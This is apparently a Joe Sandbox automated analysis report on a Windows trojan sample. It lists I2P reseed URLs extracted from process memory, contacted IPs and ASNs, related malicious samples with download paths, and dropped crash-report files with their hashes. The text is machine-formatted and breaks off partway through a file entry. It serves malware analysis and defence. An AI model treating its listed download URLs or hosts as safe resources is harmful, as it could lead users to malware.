    https://i2pseed.creativecowpat.net:8443/main.exe, main.exe, 00000022.00000002.3266524033.000002204CD00000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmptrueunknown
    https://reseed.i2p-projekt.de/31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
    https://i2p.novg.net/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
    https://reseed.memcpy.io/p/p_lib.cmain.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://netdb.i2p2.no/31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
    https://reseed.memcpy.io/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
    https://i2p.ghativega.in/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://reseed.i2pgit.org/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
      https://www2.mk16.de/31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BD8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
      https://reseed.onion.im/$main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrue
        unknown
        http://reg.i2p/hosts.txtmain.exe, main.exe, 00000022.00000002.3266524033.000002204CD5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.drfalse
          unknown
          http://reg.i2p/hosts.txtjmain.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://reseed-pl.i2pd.xyz/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
              http://stats.i2p/cgi-bin/newhosts.txt31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalse
                unknown
                http://127.0.0.1:811831yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2979115871.000002204C927000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2978974700.000002204C921000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
                http://identiguy.i2p/hosts.txt31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalse
                  unknown
                  http://reg.i2p/hosts.txtp_lib.cwJmain.exe, 00000018.00000002.2875358627.0000021B1704C000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://banana.incognet.io/b.cMmain.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://reseed.diva.exchange/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://reseed2.i2p.net/vp/p_lib.cmain.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://legit-website.com/i2pseeds.su331yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
                        https://reseed.onion.im/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        https://i2p.mooo.com/netDb/31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
                        https://i2pd.readthedocs.io/en/latest/user-guide/configuration/31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalseunknown
                        https://reseed.stormycloud.org/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        https://reseed2.i2p.net/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        https://reseed.i2pgit.org/b.cQmain.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://banana.incognet.io/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                            http://rus.i2p/hosts.txt31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drfalse
                              unknown
                              https://reseed-fr.i2pd.xyz/b.cmain.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtmain.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.drfalse
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  84.229.124.109
                                  unknownIsrael
                                  9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
                                  51.77.214.98
                                  unknownFrance
                                  16276OVHFRfalse
                                  129.159.76.100
                                  unknownUnited States
                                  14506ORCL-ASHBURN3USfalse
                                  38.143.66.87
                                  unknownUnited States
                                  63023AS-GLOBALTELEHOSTUSfalse
                                  217.233.45.79
                                  unknownGermany
                                  3320DTAGInternetserviceprovideroperationsDEfalse
                                  195.16.22.143
                                  unknownBelgium
                                  6848TELENET-ASBEfalse
                                  146.70.24.213
                                  unknownUnited Kingdom
                                  2018TENET-1ZAfalse
                                  144.172.118.154
                                  reseed.stormycloud.orgUnited States
                                  46261QUICKPACKETUStrue
                                  46.17.106.104
                                  unknownRussian Federation
                                  207569IHOR-CORE-ASRUfalse
                                  95.216.2.172
                                  reseed.memcpy.ioGermany
                                  24940HETZNER-ASDEtrue
                                  79.142.69.160
                                  unknownNetherlands
                                  51430ALTUSNLfalse
                                  40.134.93.123
                                  unknownUnited States
                                  7029WINDSTREAMUSfalse
                                  94.180.147.148
                                  unknownRussian Federation
                                  41668ERTH-KAZAN-ASRUfalse
                                  217.25.231.221
                                  unknownRussian Federation
                                  6856IC-VORONEZH-ASInformsvyaz-ChernozemyeRUtrue
                                  73.241.223.246
                                  unknownUnited States
                                  7922COMCAST-7922UStrue
                                  89.215.190.170
                                  unknownBulgaria
                                  13124IBGCBGfalse
                                  174.3.142.31
                                  unknownCanada
                                  6327SHAWCAfalse
                                  151.242.162.160
                                  unknownIran (ISLAMIC Republic Of)
                                  31549RASANAIRfalse
                                  81.110.100.190
                                  unknownUnited Kingdom
                                  5089NTLGBfalse
                                  64.99.192.91
                                  unknownCanada
                                  15348TUCOWSCAfalse
                                  185.82.126.58
                                  unknownLatvia
                                  52173MAKONIXLVfalse
                                  186.128.148.177
                                  unknownArgentina
                                  22927TelefonicadeArgentinaARfalse
                                  5.74.117.69
                                  unknownIran (ISLAMIC Republic Of)
                                  12880DCI-ASIRfalse
                                  173.44.49.91
                                  unknownUnited States
                                  8100ASN-QUADRANET-GLOBALUSfalse
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1532228
                                  Start date and time:2024-10-12 20:29:07 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 16s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:37
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@51/74@2/25
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92, 52.168.117.172
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdeus07.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target 31yd7ynpdj6jw5vl4xn9qyj7u.exe, PID 3416 because it is empty
                                  • Execution Graph export aborted for target file.exe, PID 2644 because there are no executed function
                                  • Execution Graph export aborted for target main.exe, PID 5164 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  14:30:02API Interceptor285x Sleep call for process: file.exe modified
                                  14:30:03API Interceptor43x Sleep call for process: powershell.exe modified
                                  14:30:53API Interceptor258x Sleep call for process: main.exe modified
                                  14:31:13API Interceptor2x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  79.142.69.160BL P.O_pdf.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                    BL_P.O_pdf.exeGet hashmaliciousRemcosBrowse
                                      Aaqaybpuu.exeGet hashmaliciousRemcosBrowse
                                        146.70.24.213oUbgeGwOL8.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                        • 146.70.24.213/do/1654365431.exe
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ORCL-ASHBURN3USna.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 129.152.30.246
                                        GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste3wpWVfURxT.exeGet hashmaliciousUnknownBrowse
                                        • 84.94.45.89
                                        S2sQfgIthZ.elfGet hashmaliciousMiraiBrowse
                                        • 77.125.152.104
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 213.8.246.210
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 46.121.178.119
                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 77.126.41.107
                                        na.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 84.95.12.200
                                        na.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 80.178.27.68
                                        arm7-20241006-0950.elfGet hashmaliciousUnknownBrowse
                                        • 77.124.162.245
                                        yakov.ppc.elfGet hashmaliciousMiraiBrowse
                                        • 87.71.35.118
                                        SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                        • 80.178.242.19
                                        OVHFRna.elfGet hashmaliciousMiraiBrowse
                                        • 51.254.200.173
                                        http://myweatherradar.org./Get hashmaliciousUnknownBrowse
                                        • 51.89.9.253
                                        http://link.adultspace.com/link/67097a59d79290df75176b77/aHR0cHM6Ly93d3cuZnVja2Jvb2tkYXRpbmcubmV0L2VuL2F1dGg_dXNlcj00MzMwMDA4NzEmY29kZT0xZDE3OTYyMTE3YWUwMzNjN2QyOWFlOTdkZWFhZjY1MyZyZWRpcmVjdFBhZ2U9JTJGYWNjb3VudCZyZWRpcmVjdFBhZ2VQYXJhbXMlNUJ1c2VyJTVEPTQzMzAwMDg3MQ==?linkId=link_9Get hashmaliciousUnknownBrowse
                                        • 213.32.27.206
                                        http://link.adultspace.com/link/67097a59d79290df75176b77/aHR0cHM6Ly93d3cuZnVja2Jvb2tkYXRpbmcubmV0L2VuL2F1dGg_dXNlcj00MzMwMDA4NzEmY29kZT0xZDE3OTYyMTE3YWUwMzNjN2QyOWFlOTdkZWFhZjY1MyZyZWRpcmVjdFBhZ2U9JTJGYWNjb3VudCZyZWRpcmVjdFBhZ2VQYXJhbXMlNUJ1c2VyJTVEPTQzMzAwMDg3MQ==Get hashmaliciousUnknownBrowse
                                        • 213.32.27.206
                                        https://lessonfulladvocating.z19.web.core.windows.net/Get hashmaliciousAnonymous ProxyBrowse
                                        • 149.56.240.27
                                        Cotain Spires (RFP) ID#88763.pdfGet hashmaliciousUnknownBrowse
                                        • 144.217.123.236
                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                        • 51.89.9.252
                                        https://clicks.trx-hub.com/xid/pmc_0aaa4_wwd?q=https://aussiebongs.com/#aHdheXVuLmxlZSRoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                        • 139.99.144.190
                                        http://fastuniversaldelivery.com/Get hashmaliciousUnknownBrowse
                                        • 198.27.68.93
                                        https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=actGet hashmaliciousUnknownBrowse
                                        • 54.38.176.192
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllfile.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllfile.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9673522769489433
                                                    Encrypted:false
                                                    SSDEEP:96:BEF2S4CtDacwsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHgoC5AJLnxZU6MDMr6kg:unF2cw/d0MALS36jcEazuiFhZ24lO8l
                                                    MD5:FA480588CE4E6C85CD305D34A630E4F2
                                                    SHA1:9354451DE3D64585A3491C790A25BAC52842AE24
                                                    SHA-256:45E5ECBB19D94DF9845BD2CA6C564F9030792B4BEBBA593802624E353642C8C0
                                                    SHA-512:235B91F73EC7EC731489BB409D4B8EAC02AD2BCB3C157598E073EFF7090E043650CBB7A78C455C9A83721875F05489DA90664C2FC6B33D532E5FD27178EFD190
                                                    Malicious:true
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.1.5.0.8.0.6.8.9.9.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.1.5.0.8.4.9.0.8.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.3.d.f.4.0.7.-.7.1.e.9.-.4.3.0.5.-.9.4.b.4.-.2.5.c.1.2.8.2.4.3.9.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.0.a.0.7.7.7.-.a.e.4.a.-.4.f.3.f.-.b.9.c.a.-.4.4.c.a.0.f.5.a.b.9.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.2.c.-.0.0.0.0.-.0.0.1.5.-.e.6.2.b.-.6.0.f.1.d.4.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9804894053223562
                                                    Encrypted:false
                                                    SSDEEP:96:TIFSkDacrsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQBrso:EIk2cr/d0MALS36jN7EzuiF8Z24lO8l
                                                    MD5:DA760A480514E0AA7B148B5718C59F7C
                                                    SHA1:82CCA29751CAA9085F2181783568BCAD8FDAA4D2
                                                    SHA-256:33B2617891B8BE7CE1CF7CBA129273A962414858FC48FCAFAA7527D5C78FA9D7
                                                    SHA-512:4C2D6C2A8F299D05DC4F8DA16521001AC921AE90D30BFC5E36697781E39781C93D91FDEA3F214DC49591D7ED59EF26DA976F5B8BE07A903553925D95AC72C660
                                                    Malicious:true
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.1.4.7.1.0.7.4.7.5.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.1.4.7.1.9.0.2.8.9.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.4.3.a.a.6.0.-.c.2.8.b.-.4.0.a.9.-.9.1.0.0.-.7.a.5.a.e.7.d.e.e.2.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.1.9.2.0.5.6.-.1.a.4.8.-.4.0.9.8.-.a.5.5.7.-.a.6.8.6.d.a.1.6.1.4.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.4.-.0.0.0.0.-.0.0.1.5.-.d.1.c.9.-.1.1.c.a.d.4.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sat Oct 12 18:31:48 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):607446
                                                    Entropy (8bit):1.000392921919399
                                                    Encrypted:false
                                                    SSDEEP:768:SsqPkLHKb8uSDh8DyDn+JknfXZF9F0zTYMKqoHBaz8ZI2VNF:Ss3Kb8uIh8+DnJnfXZFLHBPZI2nF
                                                    MD5:97A14606642463517549B0F8C2D215F1
                                                    SHA1:43B0E2A6C4CA74B57D9D14A2865B6AE203102680
                                                    SHA-256:D288D42CFDD83B69B9FDAE11387109B56BECF8B738F94E3237CB22A2AA9EEBEF
                                                    SHA-512:84930715FE76B9C18DB5083F242B61FBFC229846878222D1C2E23DFF2BB9FD5E9A99BD804B4CD3858036217A7F7FD9944C2AD11D7C070E701DF1C961E7DD27F8
                                                    Malicious:false
                                                    Preview:MDMP..a..... ..........g........................P...............(...........X...........`.......8...........T............+..............$ ..........."..............................................................................eJ......."......Lw......................T.......,...|..g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6692
                                                    Entropy (8bit):3.7244020032282137
                                                    Encrypted:false
                                                    SSDEEP:96:RSIU6o7wVetbcM+MjOYHV4GZi5aM4UB89bzcDUZfLHxm:R6l7wVeJcM+MKYHsprB89bzcMfLxm
                                                    MD5:EEADE911C2B31A7B695EFA12ACDF1BA5
                                                    SHA1:01C8CF314531E53E7F1ADEED4B673C3BBA860273
                                                    SHA-256:A8F7930CBD73152A31219EC5760CDFEF5EF0BAD0CCA637B343D841323964CE3F
                                                    SHA-512:676BDADF969A24172D2FCCFAAC755E3D89ABF1880917B799172A839D5BA12F991C9FC86D3CB1920750C4CFE60294BA114889DFF70A022BF2A4B88C10765ECE67
                                                    Malicious:false
